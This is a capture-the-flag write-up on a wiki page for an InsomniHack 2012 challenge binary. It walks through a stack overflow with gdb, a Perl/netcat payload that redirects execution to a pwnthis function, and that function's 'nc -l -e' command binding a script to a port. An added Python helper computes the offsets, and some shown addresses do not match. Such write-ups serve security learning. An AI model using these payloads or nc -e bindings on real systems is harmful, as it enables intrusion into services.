Changes

InsomniHack-2012/Exploitation/3 Taberne

643 bytes added, 12:03, 6 March 2012
We downloaded a file called "toto",
<syntaxhighlight lang="bash">
# file toto
toto: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
# ./toto 1234
</syntaxhighlight>
On a client, we get:
<syntaxhighlight lang="bash">
> nc 172.16.199.131 1234
Adieu l'ami, dis-voir c'que c'est ton mot de passe: blabla
De dieu, tu t'en souviens pas? C'est balot!
</syntaxhighlight>
It's an exploitation challenge, so on the server we debug the program (it forks, so we follow the child):
<syntaxhighlight lang="bash">
# gdb -q ./toto
(gdb) set follow-fork-mode child
(gdb) r 1234
Starting program: /root/toto 1234
</syntaxhighlight>
On the client, let's do:
<syntaxhighlight lang="bash">
> echo `perl -e 'print "A"x24 '`| nc 172.16.199.131 1234
Adieu l'ami, dis-voir c'que c'est ton mot de passe:
</syntaxhighlight>
And the server segfaults:
<syntaxhighlight lang="bash">
Program received signal SIGSEGV, Segmentation fault.
[Switching to process 1962]
0x41414141 in ?? ()
</syntaxhighlight>
The backtrace is definitely screwed, so we just have a quick look:
<syntaxhighlight lang="bash">
(gdb) bt
#0  0x41414141 in ?? ()
#1  0x0000000a in ?? ()
#2  0x00000006 in ?? ()
#3  0xbfa7476c in ?? ()
#4  0xb7f73ff4 in ?? () from /lib/ld-linux.so.2
#5  0xb7f57b0c in ?? ()
#6  0x00000001 in ?? ()
#7  0xbfa746b4 in ?? ()
#8  0xf3b80002 in ?? ()
#9  0x01c710ac in ?? ()
#10 0x00000000 in ?? ()
</syntaxhighlight>
Nothing usable there, so we have a quick look at checkPass instead:
<syntaxhighlight lang="asm">
0804888c <checkPass>:
 804888d: 89 e5                   mov ebp,esp
 804888f: 83 ec 28                sub esp,0x28
 8048892: c7 44 24 08 20 00 00    mov DWORD PTR [esp+0x8],0x20 <------
 8048899: 00
 804889a: 8d 45 f0                lea eax,[ebp-0x10]
 80488ac: c9                      leave
 80488ad: c3                      ret
</syntaxhighlight>
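Added example, not part of the original write-up: a small Python helper that does the frame arithmetic we did by eye on the listing above. It assumes, as the write-up does, that the local taken with `lea eax,[ebp-0x10]` is the destination buffer and that the 0x20 stored at `[esp+0x8]` is the length argument of the read that follows; the patched variant with length 0xf is a hypothetical, added only for comparison.

```python
import re

# Constructed input: the checkPass listing quoted in the write-up (only the
# lines the page shows), plus a hypothetical patched variant where the read
# length is reduced to 0xf so the 16-byte buffer can no longer overflow.
CHECKPASS = """\
0804888c <checkPass>:
 804888d: 89 e5                 mov ebp,esp
 804888f: 83 ec 28              sub esp,0x28
 8048892: c7 44 24 08 20 00 00  mov DWORD PTR [esp+0x8],0x20
 804889a: 8d 45 f0              lea eax,[ebp-0x10]
 80488ac: c9                    leave
 80488ad: c3                    ret
"""
CHECKPASS_FIXED = CHECKPASS.replace("[esp+0x8],0x20", "[esp+0x8],0xf")  # hypothetical

LEA_LOCAL = re.compile(r"lea\s+e[a-d]x,\[ebp-0x([0-9a-f]+)\]")
THIRD_ARG = re.compile(r"mov\s+DWORD PTR \[esp\+0x8\],0x([0-9a-f]+)")

def frame_analysis(listing):
    """Infer a 32-bit cdecl frame layout from an objdump/gdb listing.

    Assumption: the `lea reg,[ebp-X]` local is the destination buffer and the
    immediate stored at [esp+0x8] is the length passed to read()/recv()."""
    buf_off = read_len = None
    for line in listing.splitlines():
        if m := LEA_LOCAL.search(line):
            buf_off = int(m.group(1), 16)
        if m := THIRD_ARG.search(line):
            read_len = int(m.group(1), 16)
    if buf_off is None or read_len is None:
        raise ValueError("no local buffer or length argument found")
    # i386 frame, stack grows down: [buffer][saved ebp (4)][return address (4)]
    ret_off = buf_off + 4
    clobbered = []
    if read_len > buf_off:
        clobbered.append("saved ebp")
    if read_len > ret_off:
        clobbered.append("return address")
    return {
        "buffer_size": buf_off,
        "read_len": read_len,
        "saved_ebp_offset": buf_off,
        "ret_offset": ret_off,
        "bytes_to_reach_ret": ret_off + 4,
        "clobbered": clobbered,
    }
```

For the listing on this page it reports a 16-byte buffer, a 32-byte read, the return address at offset 20 and 24 bytes needed to cover it fully, which is exactly why the 24 'A's above landed in eip.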
We shipped 24 bytes, so we overwrote the return address. Let's break on the ret of checkPass:
<syntaxhighlight lang="bash">
(gdb) b *0x80488ad
Breakpoint 1 at 0x80488ad
(gdb) c
Breakpoint 1, 0x080488ad in checkPass ()
Current language: auto; currently asm
0xbfe019cc: 0xb5df0002 0x01c710ac 0x00000000 0x00000000
0xbfe019dc: 0xd4040002 0x00000000 0x00000000 0x00000000
</syntaxhighlight>
So we overwrote it with 0x41414141. What should we put there?
A quick look at the binary shows an interesting function called pwnthis:
<syntaxhighlight lang="asm">
(gdb) disassemble pwnthis
Dump of assembler code for function pwnthis:
0x0804888b <pwnthis+156>: ret
</syntaxhighlight>
So we put that address in place of the return address, and break just before the call to system to see what it is given:
<syntaxhighlight lang="bash">
> echo `perl -e 'print "A"x20 . "\xef\x87\x04\x08" , "AAAA" . "CCCC" '`| nc 172.16.199.131 1234
Adieu l'ami, dis-voir c'que c'est ton mot de passe:
</syntaxhighlight>
And on the server side:
<syntaxhighlight lang="bash">
Breakpoint 2, 0x0804887e in pwnthis ()
(gdb) x /wx $esp
(gdb) x /s 0xbf9e3c83
0xbf9e3c83: "nc -l -e /tmp/showpass.sh -p 1128"
</syntaxhighlight>
Amazing, it's gonna open a local port on 1128. You can modify the port, since it's part of the buffer you write.
So now, we just need to connect to the remote port to execute showpass.sh. The server was dead, so validation was not possible.
<syntaxhighlight lang="bash">
> nc 172.16.199.131 1128
</syntaxhighlight>